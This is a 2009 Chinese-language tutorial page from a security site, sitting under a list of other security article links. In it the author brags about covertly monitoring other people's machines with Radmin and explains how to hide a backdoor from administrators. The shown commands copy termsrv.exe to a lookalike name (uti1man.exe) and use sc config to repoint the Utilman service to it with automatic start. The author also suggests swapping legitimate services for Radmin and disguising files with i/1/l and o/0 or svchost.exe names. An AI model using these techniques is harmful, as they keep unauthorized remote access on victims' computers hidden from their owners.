当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 服务的隐藏

安全基础
用net start 可以启动肉鸡的命令(2)
用net start 可以启动肉鸡的命令(3)
用net start 可以启动肉鸡的命令(4)
DDOS攻击 如何判断是否遭到流量攻击
网络防“虫”手段和全局安全网络的应用
个人网络安全防卫手册(1)
个人网络安全防卫手册(2)
个人网络安全防卫手册(3)
个人网络安全防卫手册(4)
个人网络安全防卫手册(5)
个人网络安全防卫手册(6)
一位高手整理的IIS FAQ
使用Exchange 2003防御地址欺骗(1)
使用Exchange 2003防御地址欺骗(2)
RAdmin 服务端高级配置(1)
只防病毒不安全 网络还需防什么(1)
只防病毒不安全 网络还需防什么(2)
主动防御电脑病毒并非天方夜谭
用XPSP2防火墙打造最强护身甲(1)
用XPSP2防火墙打造最强护身甲(2)

安全基础 中的 服务的隐藏


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 91 ::
收藏到网摘: n/a

好久没有所谓技术性的东西了,最近进人家的机器用Radmin监视人家发现现在一般的网管都会检查用户和进程(不过那个任务管理器不知道为什么不能用了,知道有木马都杀不了,不知道Windows怎么搞的),所以手脚就要在这个上面做了。
先自己详细的看下默认的Windows服务

替换或者时注意的问题

1 依存关系
2 二进制路径
3 默认启动还是自动

我靠,还可以在服务管理器里更改说明。

C:\WINNT\system32>copy termsrv.exe .\uti1man.exe
copy termsrv.exe .\uti1man.exe
已复制 1 个文件。


C:\WINNT\system>sc config utilman start= auto
sc config utilman start= auto
[SC] ChangeServiceConfig SUCCESS

C:\WINNT\system>sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe
sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe
[SC] ChangeServiceConfig SUCCESS

至于该替换哪个,我不说啊。最郁闷的是那个Performance Logs and Alerts
和c:\winnt\system\smlogsvc.exe /service
替换Radmin后,明明是禁止的,可是居然端口还等着连接。汗!
只要条件符合,几乎发现不了,除非也是高手。还有就是名字的要求,i与1与l,o与0,呵呵~~
自己发挥啊,很多的svchost.exe也没有人会怀疑吧~~~

说这么多了,自己研究去,很好玩的啊~~~~